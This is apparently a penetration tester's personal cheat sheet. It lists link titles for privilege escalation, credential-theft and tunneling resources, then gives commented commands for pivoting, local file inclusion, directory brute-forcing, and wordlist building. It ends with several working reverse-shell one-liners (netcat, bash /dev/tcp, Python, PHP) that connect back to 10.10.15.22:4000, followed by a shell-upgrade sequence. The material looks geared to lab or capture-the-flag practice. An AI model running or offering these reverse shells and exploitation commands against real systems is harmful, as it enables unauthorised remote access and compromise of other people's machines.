A collection of links and payloads I stored for quick access
- NTLM Theft
- Windows Local Privilege Escalation
- Windows Local Privilege Escalation Checklist
- Juicy Potato Exploit
- Potatoes
- Pass The Hash
- Print Spoofer
- Sweet Potato
- Druva insyncCPHwnet64.exe POC
- Druva explanation
- Apache Tomcat RCE through WAR file
- Server-Side Template Injection Payloads
- Jenkins Pentesting
- Payloads Of All Things
- MSSQL Injection Cheatsheet
- XP_cmdshell cheatsheet
- LOCAL FILE INCLUSION
- Python Library Hijacking
- GTFOBins
- LXD Privilege Escalation
- LXD Exploitation
- Exploiting User Groups
- Escape from Restricted Shells
- Traitor
- Python Library Hijacking on Linux
- Pivoting with Chisel
- Tunneling with Chisel and SSF 0XDF
- NOTES ABOUT Tunneling and Pivoting
- SSH Tunneling
- Shades of Tunneling Article
- Tunneling and Port Forwarding
- Pivoting with sshuttle and ligolo-ng
- SecLists
- Responder
- Impacket
- SQL Map
- XSStrike
- ffuf
- WinPeas
- Rogue JNDI
- RsaCtfTool
- Ghidra
- OllyDBG
- checksec
- LaZagne
- File Magic Numbers
- Rule to Rule Them ALL
# sshuttle: route 172.16.1.0/24 over SSH through balthazar@10.10.110.100 (-r),
# verbose (-v), with 172.16.1.100 excluded from the tunnel (-x). Addresses are
# the author's lab values.
sshuttle -vr balthazar@10.10.110.100 172.16.1.0/24 -x 172.16.1.100
# PHP stream-filter wrapper string, not a shell command; base64-encodes the
# named resource. Belongs with the LOCAL FILE INCLUSION link above.
php://filter/convert.base64-encode/resource=
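# 1. DIRECTORY BRUTEFORCING
# Wordlist path and target URL are quoted so they survive word-splitting;
# <target_domain> is a placeholder to fill in.
feroxbuster -eknr --wordlist "$HOME/tools/crimson/words/dir" -u "https://<target_domain>/" -o ferox.txt
# 2. PREPARE FIRST PART OF THE cewl.txt
# Keep only lines whose status column is 200 and take the URL from the last
# column. The previous pipeline matched "200" anywhere on the line (also hits
# sizes and URL paths) and cut at the first "h" (breaks when an earlier column
# contains one). Assumes feroxbuster's text output puts the status code first
# and the URL last — TODO confirm against your feroxbuster version.
# urls.txt is appended to, as before.
awk '$1 == "200" { print $NF }' ferox.txt | grep -Ev 'png|\.js' >> urls.txt
# Read urls.txt line by line so a URL is never word-split or glob-expanded;
# the "|| [[ -n "$url" ]]" clause still processes a last line that has no
# trailing newline.
while IFS= read -r url || [[ -n "$url" ]]; do
  printf '%s\n' "$url"
  cewl -d 5 "$url" >> temp_cewl.txt
done < urls.txt
# sort reads the file directly (no useless cat); rm -f -- stops the name from
# ever being parsed as an option. cewl.txt is appended to, as before.
sort -u temp_cewl.txt >> cewl.txt && rm -f -- temp_cewl.txt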
# Host discovery, ad-hoc file servers, listener and connect-back one-liners.
# Every connect-back line below opens an outbound TCP connection from a shell
# interpreter to a fixed host:port (10.10.15.22:4000 here) — exactly the
# pattern egress filtering and process-to-network telemetry key on. The
# addresses are the author's lab values.
# TCP NULL scan (-sN) of the /24, no DNS resolution (-n).
nmap -n -sN 10.10.110.0/24
# Python 2 only; the python3 equivalent is the next line.
python -m SimpleHTTPServer
python3 -m http.server
# PHP built-in web server bound to all interfaces on 8000.
php -S 0.0.0.0:8000
# Local listener on 4000 for the connect-back lines.
nc -lnvp 4000
# nc connect-back to 10.10.15.22:4000 attaching /bin/sh (-e).
nc -e /bin/sh 10.10.15.22 4000
# PHP connect-back using fsockopen + proc_open; "ip"/"port" are placeholders.
# Not a shell command.
<?php $sock = fsockopen("ip","port");$proc = proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);?>
# bash connect-back over /dev/tcp to 10.10.15.22:4000.
bash -i >& /dev/tcp/10.10.15.22/4000 0>&1
# Python 2 connect-back to the same address via socket + dup2 + subprocess.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# TTY upgrade: spawn a pty, suspend the session (Ctrl-Z is a keystroke, not a
# command), set the local terminal raw with no echo, then foreground it.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg